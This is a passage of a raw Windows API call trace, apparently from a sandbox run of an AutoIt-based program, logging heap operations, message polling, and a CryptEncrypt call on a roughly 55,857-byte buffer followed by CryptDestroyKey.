hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0165.382] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0165.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0165.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.383] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.383] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0165.383] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0165.384] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2728, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2728*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.384] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0165.384] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.385] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0165.385] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0165.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0165.386] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0165.387] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.387] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0165.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0165.388] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4a0 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0165.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0165.388] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0165.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.389] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.389] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.389] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.391] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xda2c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xda30) returned 1 [0165.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.391] CharLowerBuffW (in: lpsz="byte[55857]", cchLength=0xb | out: lpsz="byte[55857]") returned 0xb [0165.392] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.394] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.394] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.395] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa48008*, pdwDataLen=0x87e820*=0xda2c, dwBufLen=0xda30 | out: pbData=0xa48008*, pdwDataLen=0x87e820*=0xda30) returned 1 [0165.396] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.396] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.396] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.398] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.398] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.398] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.398] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0165.398] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0165.398] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.398] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0165.398] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.399] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0165.399] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.399] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0165.399] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.410] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0165.410] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.410] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.410] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0165.410] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.410] CryptDestroyKey (hKey=0x90af98) returned 1 [0165.413] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.413] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0165.413] CharUpperBuffW (in: 